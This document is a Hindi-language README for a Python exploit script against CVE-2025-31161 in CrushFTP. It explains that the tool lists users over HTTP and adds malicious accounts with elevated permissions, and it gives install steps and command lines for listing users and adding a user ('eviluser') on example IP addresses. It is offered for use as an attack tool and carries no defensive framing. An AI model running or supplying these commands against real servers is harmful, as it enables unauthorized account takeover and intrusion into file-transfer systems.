
पायथन एक्सप्लॉइट स्क्रिप्ट CVE-2025-31161 के लिए जो CrushFTP को लक्षित करती है। HTTP अनुरोधों के माध्यम से उपयोगकर्ताओं की सूची बनाती है और बढ़ी हुई अनुमतियों के साथ दुर्भावनापूर्ण खाते बनाती है।
इस रिपॉज़िटरी में CVE-2025-31161 के प्रति संवेदनशील CrushFTP सेवा के साथ इंटरैक्ट करने के लिए एक Python स्क्रिप्ट शामिल है। स्क्रिप्ट आपको मौजूदा उपयोगकर्ताओं की सूची देखने और भेद्यता का फायदा उठाकर एक दुर्भावनापूर्ण उपयोगकर्ता जोड़ने की अनुमति देती है।
requests मॉड्यूलpip install -r requirements.txt
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234